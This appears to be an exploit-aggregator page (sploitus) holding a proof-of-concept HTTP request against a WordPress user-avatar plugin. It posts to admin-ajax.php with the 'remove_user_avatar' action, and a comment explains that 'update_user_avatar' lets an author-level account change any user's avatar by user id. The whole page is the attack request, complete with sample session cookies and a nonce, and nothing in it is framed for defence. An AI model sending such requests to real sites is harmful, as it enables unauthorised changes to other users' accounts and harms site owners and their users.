Share
## https://sploitus.com/exploit?id=WPEX-ID:FBDEFAB4-614B-493B-A9AE-C5AEFF8323EF
POC request:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849
Content-Length: 472
Origin: http://your_site
DNT: 1
Connection: close
Referer: http://your_site/wordpress/?p=873
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="action"
remove_user_avatar # here you can add update_user_avatar and change avatar of user by id from AUTHOR account
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="form_data"
wpupa_url=&wpupa_attachment_id=875&user_id=1
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="security"
3f855e1991
-----------------------------49182745140183315063494246849--